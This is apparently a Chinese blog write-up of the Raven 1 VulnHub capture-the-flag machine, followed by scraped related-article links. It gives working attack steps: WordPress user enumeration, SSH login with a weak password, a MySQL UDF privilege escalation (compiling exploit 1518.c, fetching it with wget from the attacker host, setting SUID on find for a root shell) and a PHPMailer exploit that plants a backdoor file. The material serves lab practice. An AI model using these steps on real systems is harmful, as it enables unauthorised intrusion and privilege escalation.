raven靶机
仅供个人娱乐
靶机信息
Raven 下载地址:https://www.vulnhub.com/entry/raven-1,256/
一、主机探测

端口信息

目录扫描

80端口

根据页面开始搜寻有用的信息


得到信息

Wpscan漏洞利用
右上角BLOG ,会发现是 WordPress 系统。于是使用 WPScan 进行扫描
wpscan --url http://192.168.204.131/wordpress/ -ep -et -eu
-ep 枚举插件信息
-et 扫描主题
-eu 枚举用户
结果的到wordpress目录 用户等 用户有steven 和michael


发现靶机上的两个用户名:steven 和michael
使用ssh爆破 密码使用rockyou.txt
(重置虚拟机 ip改为 192.168.204.131)

将文件复制到root目录 并且解压


使用弱口令michael/michael 尝试登陆ssh

查看是否能用sudo提权,内核提权等等


一步一步 寻找有用信息

查看wp-config.php,发现mysql用户名以及密码 root/R@v3nSecurity

netstat -anpt
查看开放的端口,发现开放3306

进入数据库
root/R@v3nSecurity

信息收集



cmd5 破解

ssh登录

使用sudo python -c ‘import pty;pty.spawn("/bin/bash")’ 绕过限制,获得管理员权限

mysql udf 提权
ps -ef | grep mysql
ps -ef是以全格式显示当前所有的进程
grep 命令用于查找文件里符合条件的字符串

查看mysql udf漏洞的利用exp

进入kali apache的根目录

将文件复制到html目录

进行编译
gcc -g -c 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so

靶机切换tmp目录
靶机wget下载 kali编译生成的1518.so

连接数据库

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select*fromfoo into dumpfile'/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname'1518.so';
select*from mysql.func;
selectdo_system('chmod u+s /usr/bin/find');
exit
touch finn
find finn -exec"/bin/sh" \;
whoami




获得权限成功
打开http://192.168.204.131/vendor/
根据网页查找有用信息


searchsploit PHPMailer查看是否有漏洞,发现有漏洞利用脚本

复制到 /root

修改文件


(个人电脑问题,kali安装pip3,pip3 install requests-toolbelt)
脚本更名为 1.py 将脚本放置于/root

cd /root
python3 1.py

访问http://192.168.204.131/contact.php
此时就会生成后门文件backlion.php

接着访问后门文件:http://192.168.204.131/backlion.php

进行监听 获取shell

raven靶机的更多相关文章
- kali渗透综合靶机(十)--Raven靶机
kali渗透综合靶机(十)--Raven靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --rate=1000 ...
- Raven: 2靶机入侵
0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机.有四个flag需要找出.在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵. ...
- Raven 2 靶机渗透
0X00 前言 Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM.有四个标志要捕获.在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器 ...
- 21. 从一道CTF靶机来学习mysql-udf提权
这次测试的靶机为 Raven: 2 这里是CTF解题视频地址:https://www.youtube.com/watch?v=KbUUn3SDqaU 此次靶机主要学习 PHPMailer 跟 mymq ...
- 22. CTF综合靶机渗透(十五)
靶机说明: Game of Thrones Hacking CTF This is a challenge-game to measure your hacking skills. Set in Ga ...
- 实现一个脚本语言Raven(一)
之前实现了Raven语言的0.1版,仅仅支持表达式处理与控制语句,由于不支持数组.函数.类,甚至都不是图灵完全的语言. 现在参考vczh的博客打算重新写一遍Raven语言.陈祖不愧是神啊,高中就写出支 ...
- CTF线下防御战 — 让你的靶机变成“铜墙铁壁”
本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进 ...
- Ms17-010进行WEB提权之实践下某培训靶机服务器
前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方 ...
- metasploit利用漏洞渗透攻击靶机
1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算 ...
随机推荐
- 一文读懂高速PCB设计跟高频放大电路应用当中的阻抗匹配原理
这一期课程当中,我们会重点介绍高频信号传输当中的阻抗匹配原理以及共基极放大电路在高频应用当中需要注意的问题,你将会初步了解频率与波长的基础知识.信号反射的基本原理.特性阻抗的基本概念以及怎么样为放大电 ...
- WEB安全新玩法 [4] 防护邮箱密码重置漏洞
大部分具有账号系统的应用都会提供重置用户登录密码的功能,常见方式之一是:用户输入自己的邮箱地址或手机号,应用向这个邮箱或手机号发送验证码,用户将收到的验证码输入应用中即可完成密码重置.这一过程容易因设 ...
- 【原创】SystemVerilog中的多态和虚方法
封装可以隐藏实现细节,使代码模块化,继承可以扩展已经存在的代码模块,目的都是为了代码重用.多态是为了实现接口的重用.在SystemVerilog中,子类和父类之间多个子程序使用同一个名字的现象称为Sy ...
- jenkins在aws eks中的CI/CD及slave
本文档不讲解jenkins的基础用法,主要讲解配合k8s的插件,和pipeline的用途和k8s ci/cd的流程. 以及部署在k8s集群内和集群外的注意事项. 1.准备工作 以下在整个CI/CD流程 ...
- Keepalive介绍及工作原理
注:keepalive和Nginx和高可用没有关联. 1.什么是高可用,为什么要设计高可用? 1.两台业务系统启动着相同的服务,如果有一台故障,另一台自动接管,我们将国称之为高可用.2.系统可用率算法 ...
- uniapp 微信小程序扫码处理
1.view 代码 <view class="v-main-scan"> <uni-icons @click="scanCode" clas ...
- WebService:CXF的JaxWsDynamicClientFactory实现调用WebService接口
首先需要引入依赖jar包 #版本只供参考,具体看项目 <dependency> <grouId>org.apache.cxf</grouId> <artifa ...
- XCTF WEB backup
不用多说,肯定是扫描后台,目录看看能不能找到备份文件,(可恶我的御剑的字典太菜了,居然爆破不出来),建议大家装御剑高一些的版本,或者用dirsearch来扫描,都是不错的. 这里插个知识点,备份文件常 ...
- WPF技巧:通过代码片段管理器编写自己常用的代码模板提示效率
在写自定义控件的时候,有一部分功能是当内部的值发生变化时,需要通知控件的使用者,而当我在写依赖项属性的时候,我可以通过popdp对应的代码模板来完成对应的代码,但是当我来写属性更改回调的时候,却发现没 ...
- ESP32存储blog笔记
基于ESP-IDF4.1 1 #include <stdio.h> 2 #include "freertos/FreeRTOS.h" 3 #include " ...